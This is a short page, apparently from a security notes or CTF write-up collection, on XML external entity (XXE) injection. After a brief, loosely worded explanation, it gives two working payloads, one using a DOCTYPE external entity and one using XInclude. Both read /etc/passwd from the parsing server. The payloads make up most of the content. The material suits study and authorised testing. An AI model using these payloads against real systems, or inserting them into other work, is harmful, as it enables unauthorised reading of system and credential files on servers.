XXE

Description

This vulnerability can enable an attacker to add something known as a DTD to a normal XML object. However when this XML object is parsed, the DTD is also parsed, and this causes the payload to be executed. Usually the trickiest part is to find someplace to actually upload that XML.

Payloads

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE creds [
<!ELEMENT creds ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<profile>
	<users>
		<user>
		<firstname>&xxe;</firstname>
		<lastname>pass</lastname>
		</user>
	</users>
</profile>

<?xml version="1.0" encoding="UTF-8" ?>
<profile xmlns:xi="http://www.w3.org/2001/XInclude">
  <users>
    <user>
      <firstname>
        xmlns:xi="http://www.w3.org/2001/XInclude">
        <xi:include parse="text" href="file:///etc/passwd" />
      </firstname>
      <lastname>DOE</lastname>
    </user>
  </users>
</profile>

PreviousShady Oaks NextTanuki

Last updated 3 months ago

hashtagDescription

hashtagPayloads

Description

Payloads